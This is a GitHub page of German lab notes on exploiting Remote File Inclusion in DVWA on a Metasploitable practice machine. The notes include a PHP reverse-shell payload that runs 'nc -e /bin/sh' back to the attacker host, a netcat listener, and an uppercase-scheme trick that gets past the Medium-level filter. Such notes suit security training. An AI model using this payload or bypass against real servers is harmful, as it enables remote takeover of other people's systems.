-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathRemoteFileInclusion
55 lines (34 loc) · 889 Bytes
/
RemoteFileInclusion
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
Remote File Inclusion
######################
# metasploitable #
######################
sudo -i
nano /etc/php5/cgi/php.ini
allow_url_fopen = On
und
allow_url_include = On
auf on setzen
Apache restart
/etc/init.d/apache2 restart
####################
# Auf dem Kali #
####################
touch myrat.txt
echo "<?php shell_exec('nc -e /bin/sh 10.10.10.109 443');?>" > myrat.txt
<?php
shell_exec('nc -e /bin/sh 10.10.10.109 443');
?>
cp myrat.txt /var/www/html/
service apache2 restart
nc -vv -l -p 443
##########
# DVWA #
##########
Security auf Low
File Inclusion
http://10.10.10.103/dvwa/vulnerabilities/fi/?page=http://10.10.10.109/myrat.txt
für Security Medium
kein http:// und https:// möglich deshalb gross schreiben
HTTP://10.10.10.103/dvwa/vulnerabilities/fi/?page=http://10.10.10.109/myrat.txt
10.10.10.103 ist metasploitable
10.10.10.109 ist Kali